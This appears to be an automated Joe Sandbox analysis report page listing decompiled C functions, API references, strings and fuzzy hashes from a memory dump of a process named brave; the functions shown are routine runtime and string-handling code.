Download Yara Rule

C-Code - Quality: 66%

			E00007FF67FF652B33D00(void* __edi, long long __rcx, void* __rdx, void* _a8, long long _a32, long long _a40, intOrPtr _a96) {
				intOrPtr _t9;
				long _t13;
				void* _t14;
				intOrPtr _t17;
				intOrPtr* _t22;
				long long _t24;

				_t9 =  *0x52de13e0; // 0x0
				_a8 = __rcx;
				if (_t9 == 0) goto 0x52b33d9c;
				_t22 = _a8;
				if (_t22 != 0) goto 0x52b33d50;
				r8d = GetCurrentThreadId();
				_pop(_t24);
				goto 0x52b41680;
				asm("o16 nop [eax+eax]");
				E00007FF67FF652B33190(__edi, _a96);
				E00007FF67FF652B33190(__edi, _a96);
				_t17 =  *_t22;
				_t13 = GetCurrentThreadId();
				_t14 = E00007FF67FF652B33190(_t17, _a96);
				_a40 = _t24;
				r9d = _t17;
				r8d = _t13;
				_a32 =  *((intOrPtr*)(_t22 + 0x28));
				0x52b41680();
				return _t14;
			}

0x7ff652b33d08
0x7ff652b33d0e
0x7ff652b33d18
0x7ff652b33d1e
0x7ff652b33d26
0x7ff652b33d3a
0x7ff652b33d41
0x7ff652b33d45
0x7ff652b33d4a
0x7ff652b33d55
0x7ff652b33d63
0x7ff652b33d68
0x7ff652b33d6a
0x7ff652b33d77
0x7ff652b33d7c
0x7ff652b33d81
0x7ff652b33d84
0x7ff652b33d87
0x7ff652b33d96
0x7ff652b33da4

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF652B33D28
GetCurrentThreadId.KERNEL32 ref: 00007FF652B33D6A

Strings

T%p %d V=%0X H=%p %s, xrefs: 00007FF652B33D8F
T%p %d %s, xrefs: 00007FF652B33D33

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CurrentThread
String ID: T%p %d %s$T%p %d V=%0X H=%p %s
API String ID: 2882836952-2059990036
Opcode ID: fb28173ffc3efe5c2c797d80106deafb06b5f9291af923cbf097269bcea0b66e
Instruction ID: 624ec9d8a87cf1a742819597f0e4c912a00e741ed355167771631081602694b4
Opcode Fuzzy Hash: fb28173ffc3efe5c2c797d80106deafb06b5f9291af923cbf097269bcea0b66e
Instruction Fuzzy Hash: 47016132B09B0282EA119B16EC5446A63A5BB95BDCF4C4631ED4CE7754DEBCE481C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2F210 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF652B2F24C
calloc.MSVCRT ref: 00007FF652B2F25B

Strings

C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c, xrefs: 00007FF652B2F23E
!dso || dso == &__dso_handle, xrefs: 00007FF652B2F245

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: _assertcalloc
String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
API String ID: 615528074-4180103562
Opcode ID: 3ff3c1c08b56fb9e230e04f1b49c40747e94c7a2db62898a806f7c776ec9269e
Instruction ID: 33a78fa2ffc529954bfbe7240000e584a558baef36c72be093230ee4f9cbbc9c
Opcode Fuzzy Hash: 3ff3c1c08b56fb9e230e04f1b49c40747e94c7a2db62898a806f7c776ec9269e
Instruction Fuzzy Hash: DB01BCA2B18B0641FB158B55FC402B92295AF467CCFCC8230DA4CE7781EEACE981C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2E1F0 Relevance: 6.3, APIs: 5, Instructions: 94
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00007FF67FF652B2E1F0(void* __rax, void* __rcx, void* __rdx, intOrPtr* __r8, intOrPtr* __r9) {
				intOrPtr _v48;
				long long _v56;
				long long _v64;
				char _v72;
				void* _t10;
				void* _t14;
				void* _t15;
				intOrPtr* _t28;
				intOrPtr* _t36;

				_t36 = __r8;
				_t28 = __r9;
				if (__rcx == 0) goto 0x52b2e2e0;
				if (__rdx == 0) goto 0x52b2e21b;
				if (__r8 == 0) goto 0x52b2e2e0;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0;
				_v48 = 0;
				if (E00007FF67FF652B2D760(_t10, _t15, __rax, __rcx, 0x7ff652b251f0,  &_v72) == 0) goto 0x52b2e320;
				if (_v48 == 0) goto 0x52b2e2c0;
				if (_v72 == 0) goto 0x52b2e33d;
				if (__rdx == 0) goto 0x52b2e310;
				strlen(??);
				if (__rax -  *_t36 >= 0) goto 0x52b2e300;
				_t14 = memcpy(??, ??, ??);
				free(??);
				if (_t28 == 0) goto 0x52b2e2ad;
				 *_t28 = 0;
				return _t14;
			}

0x7ff652b2e1fe
0x7ff652b2e201
0x7ff652b2e207
0x7ff652b2e210
0x7ff652b2e215
0x7ff652b2e227
0x7ff652b2e230
0x7ff652b2e239
0x7ff652b2e242
0x7ff652b2e251
0x7ff652b2e262
0x7ff652b2e26c
0x7ff652b2e275
0x7ff652b2e27e
0x7ff652b2e286
0x7ff652b2e292
0x7ff652b2e29d
0x7ff652b2e2a5
0x7ff652b2e2a7
0x7ff652b2e2bb

APIs

strlen.MSVCRT ref: 00007FF652B2E27E
memcpy.MSVCRT ref: 00007FF652B2E292
free.MSVCRT ref: 00007FF652B2E29D

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 498b3f5b9e13853de3fd77891ce67d711f26d8732301d510346af88e7737a2e8
Instruction ID: 347b9c82f9fcc3c0ddb5c3e516a0a4844e1bfdfc19e1d30b95ca432bdb83745b
Opcode Fuzzy Hash: 498b3f5b9e13853de3fd77891ce67d711f26d8732301d510346af88e7737a2e8
Instruction Fuzzy Hash: F531D2A2A1974281FE624A13AE403BB5291BF4279CF0C4531EECFAA3C4DFBDF4458640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B3D380 Relevance: 6.3, APIs: 4, Instructions: 321COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF652B3D471

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: d70349bc9c1524d26521fd65c4a458df4fb405ac5d07478a6779465ec2e0c7d3
Instruction ID: e3c535a8badab2798cbe90650db3c4503cdfa389590af39ddfc38fd1f073ed30
Opcode Fuzzy Hash: d70349bc9c1524d26521fd65c4a458df4fb405ac5d07478a6779465ec2e0c7d3
Instruction Fuzzy Hash: C7C1D6A7E1864347F7254A24880033A26A1BF26BACF2D4234DE6DA77C5CEBDF945C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B3A7D0 Relevance: 6.3, APIs: 4, Instructions: 319COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF652B3A8C1

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 346d97d3c0f16ec61348305e898cb21c60e62e2f68d204def2d18b4ac65c552e
Instruction ID: ae1e86a137ab7f301e7f77b94eb7a1f3f43e042cfbb95381c75c6580f59f9d15
Opcode Fuzzy Hash: 346d97d3c0f16ec61348305e898cb21c60e62e2f68d204def2d18b4ac65c552e
Instruction Fuzzy Hash: 72C1B4E3E1824247E7214A24890437A2AA1BF2675CF3D8335DA6DB77C5CEBDF9468740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2D760 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 315
stringCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00007FF67FF652B2D760(signed int __eax, signed int __edx, void* __rax, signed char* __rcx, long long __rdx, long long __r8) {
				signed int _t83;
				void* _t86;
				int _t89;
				signed int _t91;
				void* _t94;
				signed int _t108;
				void* _t111;
				void* _t113;
				long long _t137;
				signed long long _t140;
				unsigned long long _t160;
				long long* _t165;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t169;
				void* _t170;
				signed long long _t182;
				void* _t184;
				signed char* _t188;
				void* _t189;
				signed char* _t190;

				_t167 = _t166 - 0x218;
				_t165 = _t167 + 0x80;
				r15d =  *__rcx & 0x000000ff;
				_t111 = r15b - 0x5f;
				if (_t111 == 0) goto 0x52b2dad0;
				asm("repe cmpsb");
				asm("sbb al, 0x0");
				r14d = 0;
				if ((__eax & 0xffffff00 | _t111 > 0x00000000) != 0) goto 0x52b2d7e0;
				_t113 = (__rcx[8] & 0x000000ff) - 0x24 - 0x3b;
				if (_t113 > 0) goto 0x52b2d7e0;
				asm("dec eax");
				if (_t113 >= 0) goto 0x52b2d7e0;
				_t83 = __rcx[9] & 0x000000ff;
				if (_t83 == 0x44) goto 0x52b2db10;
				if (_t83 == 0x49) goto 0x52b2db10;
				strlen(??);
				 *((long long*)(_t165 - 0x50)) = __rcx;
				 *((intOrPtr*)(_t165 - 0x40)) = 0x11;
				r8d = __rax + __rax;
				 *((long long*)(_t165 - 0x48)) = __rax + __rcx;
				 *(_t165 - 0x38) = __rcx;
				 *(_t165 - 0x24) = r8d;
				 *((intOrPtr*)(_t165 - 0x28)) = 0;
				 *((intOrPtr*)(_t165 - 0x14)) = __edx;
				 *((intOrPtr*)(_t165 - 0x18)) = 0;
				 *((long long*)(_t165 - 0x10)) = 0;
				 *((long long*)(_t165 - 8)) = 0;
				 *_t165 = 0;
				if (r8d - 0x800 > 0) goto 0x52b2dab3;
				_t86 = E00007FF67FF652B2F680(0);
				_t168 = _t167 - (r8d << 5);
				_t160 = _t168 + 0x27;
				E00007FF67FF652B2F680(_t86);
				_t169 = _t168 - (0x0000000f + __edx * 0x00000008 & 0xfffffff0);
				 *(_t165 - 0x30) = _t160 & 0xfffffff8;
				_t137 = _t169 + 0x20;
				 *((long long*)(_t165 - 0x20)) = _t137;
				if (r14d == 1) goto 0x52b2dae8;
				_t23 = _t189 - 2; // -2
				if (_t23 - 1 > 0) goto 0x52b2daf8;
				_t190 =  &(__rcx[0xb]);
				 *(_t165 - 0x38) = _t190;
				if (__rcx[0xb] != 0x5f) goto 0x52b2d8b8;
				if (__rcx[0xc] == 0x5a) goto 0x52b2dc32;
				 *(_t165 - 0x60) = _t160 >> 3;
				 *(_t165 - 0x54) = r8d;
				_t89 = strlen(??);
				r8d =  *(_t165 - 0x54);
				_t182 =  *(_t165 - 0x60);
				if (r8d <= 0) goto 0x52b2dbf3;
				 *((long long*)(4 + _t182 * 8)) = 0;
				 *((intOrPtr*)(_t165 - 0x28)) = 1;
				if (_t89 <= 0) goto 0x52b2dbf3;
				 *(_t182 * 8) = 0;
				 *(0x10 + _t182 * 8) = _t190;
				 *(0x18 + _t182 * 8) = _t89;
				r9d = 0;
				E00007FF67FF652B24DD0();
				strlen(??);
				_t188 =  &(( *(_t165 - 0x38))[_t137]);
				 *(_t165 - 0x38) = _t188;
				_t91 =  *_t188 & 0x000000ff;
				if (_t91 != 0) goto 0x52b2daee;
				if (_t137 == 0) goto 0x52b2daee;
				 *((long long*)(_t165 + 0x120)) = __rdx;
				_t184 = _t165 + 0x10;
				 *((char*)(_t165 + 0x118)) = 0;
				 *((long long*)(_t165 + 0x110)) = 0;
				 *((long long*)(_t165 + 0x128)) = __r8;
				 *((long long*)(_t165 + 0x130)) = 0;
				 *((long long*)(_t165 + 0x138)) = 0;
				 *((long long*)(_t165 + 0x140)) = 0;
				 *((long long*)(_t165 + 0x148)) = 0;
				 *((intOrPtr*)(_t165 + 0x150)) = 0;
				 *((long long*)(_t165 + 0x158)) = 0;
				 *((long long*)(_t165 + 0x160)) = 0;
				 *((long long*)(_t165 + 0x168)) = 0;
				 *((long long*)(_t165 + 0x170)) = 0;
				 *((long long*)(_t165 + 0x178)) = 0;
				E00007FF67FF652B250B0();
				if ( *((intOrPtr*)(_t165 + 0x144)) - 0x7ff > 0) goto 0x52b2da0c;
				 *((intOrPtr*)(_t165 + 0x144)) = 0;
				 *((long long*)(_t165 + 0x180)) = 0;
				_t108 =  *(_t165 + 0x17c) * _t91;
				_t139 =  <=  ? _t184 :  *((intOrPtr*)(_t165 + 0x16c));
				_t140 = ( <=  ? _t184 :  *((intOrPtr*)(_t165 + 0x16c))) << 4;
				 *(_t165 + 0x17c) = _t108;
				E00007FF67FF652B2F680(_t91);
				_t170 = _t169 - _t140;
				_t94 =  >  ? _t108 : 1;
				E00007FF67FF652B2F680(_t140);
				 *((long long*)(_t165 + 0x160)) = _t170 + 0x20;
				 *((long long*)(_t165 + 0x170)) = _t170 - (_t140 << 4) + 0x20;
				E00007FF67FF652B2BFE0(_t184, _t137);
				 *((char*)(_t165 +  *((intOrPtr*)(_t165 + 0x110)) + 0x10)) = 0;
				 *((intOrPtr*)(_t165 + 0x120))();
				return 0 |  *((intOrPtr*)(_t165 + 0x140)) == 0x00000000;
			}

0x7ff652b2d76c
0x7ff652b2d773
0x7ff652b2d77b
0x7ff652b2d788
0x7ff652b2d78c
0x7ff652b2d7a1
0x7ff652b2d7a6
0x7ff652b2d7a8
0x7ff652b2d7ad
0x7ff652b2d7b7
0x7ff652b2d7b9
0x7ff652b2d7c5
0x7ff652b2d7c9
0x7ff652b2d7cb
0x7ff652b2d7d2
0x7ff652b2d7da
0x7ff652b2d7e3
0x7ff652b2d7e8
0x7ff652b2d7f2
0x7ff652b2d7f9
0x7ff652b2d7fd
0x7ff652b2d803
0x7ff652b2d807
0x7ff652b2d80b
0x7ff652b2d812
0x7ff652b2d815
0x7ff652b2d81c
0x7ff652b2d824
0x7ff652b2d82c
0x7ff652b2d83b
0x7ff652b2d84b
0x7ff652b2d850
0x7ff652b2d856
0x7ff652b2d872
0x7ff652b2d877
0x7ff652b2d87a
0x7ff652b2d87e
0x7ff652b2d883
0x7ff652b2d88b
0x7ff652b2d891
0x7ff652b2d898
0x7ff652b2d89e
0x7ff652b2d8a7
0x7ff652b2d8ab
0x7ff652b2d8b2
0x7ff652b2d8bb
0x7ff652b2d8bf
0x7ff652b2d8c3
0x7ff652b2d8c8
0x7ff652b2d8cc
0x7ff652b2d8d3
0x7ff652b2d8d9
0x7ff652b2d8e5
0x7ff652b2d8ee
0x7ff652b2d8f4
0x7ff652b2d904
0x7ff652b2d90c
0x7ff652b2d923
0x7ff652b2d929
0x7ff652b2d938
0x7ff652b2d93d
0x7ff652b2d940
0x7ff652b2d944
0x7ff652b2d94b
0x7ff652b2d954
0x7ff652b2d95a
0x7ff652b2d961
0x7ff652b2d96b
0x7ff652b2d972
0x7ff652b2d97d
0x7ff652b2d984
0x7ff652b2d98f
0x7ff652b2d99a
0x7ff652b2d9a5
0x7ff652b2d9b0
0x7ff652b2d9ba
0x7ff652b2d9c5
0x7ff652b2d9d0
0x7ff652b2d9db
0x7ff652b2d9e6
0x7ff652b2d9f1
0x7ff652b2da00
0x7ff652b2da02
0x7ff652b2da21
0x7ff652b2da2c
0x7ff652b2da31
0x7ff652b2da35
0x7ff652b2da39
0x7ff652b2da3f
0x7ff652b2da44
0x7ff652b2da4b
0x7ff652b2da59
0x7ff652b2da66
0x7ff652b2da78
0x7ff652b2da7f
0x7ff652b2da98
0x7ff652b2da9d
0x7ff652b2dac6

APIs

strlen.MSVCRT ref: 00007FF652B2D7E3
strlen.MSVCRT ref: 00007FF652B2D8C3
strlen.MSVCRT ref: 00007FF652B2D938

Strings

_GLOBAL_, xrefs: 00007FF652B2D797

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: strlen
String ID: _GLOBAL_
API String ID: 39653677-770460502
Opcode ID: a980d7a97dd603dd885cedb4aa38cc9247ee4e0068a44f4649bb0ec17d10a106
Instruction ID: 86d90c946f01b0ef3c7d74b2f1513cd6e835368f58415c1b414014d4f63da959
Opcode Fuzzy Hash: a980d7a97dd603dd885cedb4aa38cc9247ee4e0068a44f4649bb0ec17d10a106
Instruction Fuzzy Hash: 8FD1F3B2A087D689F7608B219C143FE3BA2EB0679CF484135DA9DA7789CFBC9545C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B3D8C0 Relevance: 6.2, APIs: 4, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2003478f90ec538c76f09482347ae3f7c76a6382b38b985e93f8e09ec77093db
Instruction ID: 5dfee7deb57e4d57f3fc14f8a908ebbf602c386f4cef26c46afebb9eb43a87f8
Opcode Fuzzy Hash: 2003478f90ec538c76f09482347ae3f7c76a6382b38b985e93f8e09ec77093db
Instruction Fuzzy Hash: 19919172E0825387E7658F298A0037966A1BB26B9CF5C8231CF1DA77C4DEBCE801C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B3AD10 Relevance: 6.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6e5f4dbbebcdbe2464d60878269abd70efe3d9c16f3e99d452a50a930ed317
Instruction ID: 132b5fb91d06a249efb4a82698bd94a505c2d523b797b795ae36dd350ed7131f
Opcode Fuzzy Hash: 3e6e5f4dbbebcdbe2464d60878269abd70efe3d9c16f3e99d452a50a930ed317
Instruction Fuzzy Hash: A29195B2E0925287E7658F2989403796AD1BB16B9CF6C8131CE4DE73C8DFBCE8018740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B49C50 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 192
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B49C50(void* __eflags, long long* __rcx, signed char* __rdx, long long __r8) {
				long long _v32;
				signed int _t6;
				long long _t15;

				_t15 = __rcx + 0x10;
				 *__rcx = _t15;
				if (__eflags == 0) goto 0x52b49c75;
				if (__rdx == 0) goto 0x52b49ce4;
				_v32 = __r8;
				if (__r8 - 0xf > 0) goto 0x52b49cb0;
				if (__r8 != 1) goto 0x52b49ca0;
				_t6 =  *__rdx & 0x000000ff;
				 *(__rcx + 0x10) = _t6;
				 *((long long*)(__rcx + 8)) = __r8;
				 *((char*)(_t15 + __r8)) = 0;
				return _t6;
			}

0x7ff652b49c5e
0x7ff652b49c68
0x7ff652b49c6e
0x7ff652b49c73
0x7ff652b49c75
0x7ff652b49c7e
0x7ff652b49c84
0x7ff652b49c86
0x7ff652b49c8b
0x7ff652b49c8e
0x7ff652b49c92
0x7ff652b49c9e

Strings

basic_string::_M_construct null not valid, xrefs: 00007FF652B49CE4, 00007FF652B49D94, 00007FF652B49E44

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID: basic_string::_M_construct null not valid
API String ID: 0-3522614731
Opcode ID: 14aa54d20c428766249a2dcfb27d26650a5f1dce7f3d40a69184aa0789750512
